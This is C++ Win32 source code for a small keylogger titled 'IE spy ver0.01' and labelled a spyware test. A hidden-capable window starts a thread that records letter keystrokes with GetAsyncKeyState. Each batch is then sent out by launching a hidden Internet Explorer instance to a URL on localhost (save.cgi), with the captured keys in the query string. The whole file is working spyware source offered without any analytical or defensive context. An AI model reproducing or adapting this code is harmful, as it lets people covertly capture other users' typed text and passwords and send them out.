#define WIN32_LEAN_AND_MEAN #include #include #pragma comment(lib, "WSock32.lib") #define TEXT_SIZE (15) #define HOST_NAME "localhost" #define FILE_PATH "/save.cgi" #define FILE_TITLE "spyware test" #define PRGRM_NAME "C:\\Program Files\\Internet Explorer\\iexplore.exe" LPCTSTR szWindowClass = TEXT("spy"); LPCTSTR szTitle = TEXT("IE spy ver0.01"); //#define HIDE HINSTANCE hInst; ATOM MyRegisterClass(HINSTANCE hInstance); BOOL InitInstance(HINSTANCE, int); LRESULT CALLBACK WndProc(HWND, UINT, WPARAM, LPARAM); typedef struct{ BOOL ThreadFlag; HWND hWnd; } DATA; DWORD WINAPI Logger(LPVOID lpvoid); BOOL SendLogData(char *MainMemory, UINT len); int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPTSTR lpCmdLine, int nCmdShow) { MSG msg; MyRegisterClass(hInstance); if (!InitInstance (hInstance, nCmdShow)) { return FALSE; } BOOL bRet; while ((bRet = GetMessage(&msg, NULL, 0, 0)) != 0) { if(bRet == -1) { break; } if (!TranslateAccelerator(msg.hwnd, NULL, &msg)) { TranslateMessage(&msg); DispatchMessage(&msg); } } return (int) msg.wParam; } ATOM MyRegisterClass(HINSTANCE hInstance) { WNDCLASSEX wcex; wcex.cbSize = sizeof(WNDCLASSEX); wcex.style = CS_HREDRAW | CS_VREDRAW; wcex.lpfnWndProc = (WNDPROC)WndProc; wcex.cbClsExtra = 0; wcex.cbWndExtra = 0; wcex.hInstance = hInstance; wcex.hIcon = LoadIcon(hInstance, NULL); wcex.hCursor = LoadCursor(NULL, IDC_ARROW); wcex.hbrBackground = (HBRUSH)(COLOR_WINDOW+1); wcex.lpszMenuName = (LPCTSTR)NULL; wcex.lpszClassName = szWindowClass; wcex.hIconSm = LoadIcon(wcex.hInstance, NULL); return RegisterClassEx(&wcex); } BOOL InitInstance(HINSTANCE hInstance, int nCmdShow) { HWND hWnd; hInst = hInstance; hWnd = CreateWindow(szWindowClass, szTitle, WS_OVERLAPPEDWINDOW, CW_USEDEFAULT, 0, CW_USEDEFAULT, 0, NULL, NULL, hInstance, NULL); if (!hWnd) { return FALSE; } #ifndef HIDE ShowWindow(hWnd, nCmdShow); UpdateWindow(hWnd); #endif return TRUE; } LRESULT CALLBACK WndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam) { static DATA Data; static HANDLE Thread; switch (message) { case WM_CREATE: Data.hWnd = hWnd; Data.ThreadFlag = TRUE; DWORD ID; if((Thread = CreateThread(NULL, 0, Logger, (LPVOID)&Data, 0, &ID)) == NULL){ DestroyWindow(hWnd); } break; case WM_DESTROY: Data.ThreadFlag = FALSE; WaitForSingleObject(Thread, 3000); CloseHandle(Thread); PostQuitMessage(0); break; default: return DefWindowProc(hWnd, message, wParam, lParam); } return 0; } DWORD WINAPI Logger(LPVOID lpvoid) { DATA *Data = (DATA *)lpvoid; UINT len = 0; char MainMemory[TEXT_SIZE + 1]; ZeroMemory(MainMemory, sizeof(MainMemory)); while( Data->ThreadFlag ){ if(GetAsyncKeyState('A') & 0x8000){ MainMemory[len] = 'A', len++; } if(GetAsyncKeyState('B') & 0x8000){ MainMemory[len] = 'B', len++; } if(GetAsyncKeyState('C') & 0x8000){ MainMemory[len] = 'C', len++; } if(GetAsyncKeyState('D') & 0x8000){ MainMemory[len] = 'D', len++; } if(GetAsyncKeyState('E') & 0x8000){ MainMemory[len] = 'E', len++; } if(GetAsyncKeyState('F') & 0x8000){ MainMemory[len] = 'F', len++; } if(GetAsyncKeyState('G') & 0x8000){ MainMemory[len] = 'G', len++; } if(GetAsyncKeyState('H') & 0x8000){ MainMemory[len] = 'H', len++; } if(GetAsyncKeyState('I') & 0x8000){ MainMemory[len] = 'I', len++; } if(GetAsyncKeyState('J') & 0x8000){ MainMemory[len] = 'J', len++; } if(GetAsyncKeyState('K') & 0x8000){ MainMemory[len] = 'K', len++; } if(GetAsyncKeyState('L') & 0x8000){ MainMemory[len] = 'L', len++; } if(GetAsyncKeyState('M') & 0x8000){ MainMemory[len] = 'M', len++; } if(GetAsyncKeyState('N') & 0x8000){ MainMemory[len] = 'N', len++; } if(GetAsyncKeyState('O') & 0x8000){ MainMemory[len] = 'O', len++; } if(GetAsyncKeyState('P') & 0x8000){ MainMemory[len] = 'P', len++; } if(GetAsyncKeyState('Q') & 0x8000){ MainMemory[len] = 'Q', len++; } if(GetAsyncKeyState('R') & 0x8000){ MainMemory[len] = 'R', len++; } if(GetAsyncKeyState('S') & 0x8000){ MainMemory[len] = 'S', len++; } if(GetAsyncKeyState('T') & 0x8000){ MainMemory[len] = 'T', len++; } if(GetAsyncKeyState('U') & 0x8000){ MainMemory[len] = 'U', len++; } if(GetAsyncKeyState('V') & 0x8000){ MainMemory[len] = 'V', len++; } if(GetAsyncKeyState('W') & 0x8000){ MainMemory[len] = 'W', len++; } if(GetAsyncKeyState('X') & 0x8000){ MainMemory[len] = 'X', len++; } if(GetAsyncKeyState('Y') & 0x8000){ MainMemory[len] = 'Y', len++; } if(GetAsyncKeyState('Z') & 0x8000){ MainMemory[len] = 'Z', len++; } if( !(TEXT_SIZE > len) ){ if(SendLogData(MainMemory, len)){ DestroyWindow(Data->hWnd); } ZeroMemory(MainMemory, sizeof(MainMemory)); len = 0; } Sleep(100); } return 0; } BOOL SendLogData(char *MainMemory, UINT len) { int SendAllDataLen; SendAllDataLen = (int)strlen(PRGRM_NAME); SendAllDataLen += (int)strlen(HOST_NAME); SendAllDataLen += (int)strlen(FILE_PATH); SendAllDataLen += len; char *SendAllData = new char[SendAllDataLen + 16]; wsprintf(SendAllData, "%s http://%s%s?%s\r\n", TEXT(PRGRM_NAME), TEXT(HOST_NAME), TEXT(FILE_PATH), MainMemory); STARTUPINFO SI; ZeroMemory(&SI, sizeof(SI)); SI.cb = sizeof(SI); SI.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES; SI.wShowWindow = SW_HIDE; PROCESS_INFORMATION PI; if(CreateProcess(NULL, SendAllData, NULL, NULL, TRUE, 0, NULL, NULL, &SI, &PI) != TRUE){ return TRUE; } char Title[256]; wsprintf(Title, "%s - Microsoft Internet Explorer", TEXT(FILE_TITLE)); HWND ieWindow; if((ieWindow = FindWindow(NULL, Title)) == NULL){ return TRUE; } PostMessage(ieWindow ,WM_CLOSE, 0, 0); WaitForSingleObject(PI.hProcess, 3000); CloseHandle(PI.hProcess); delete []SendAllData; return FALSE; }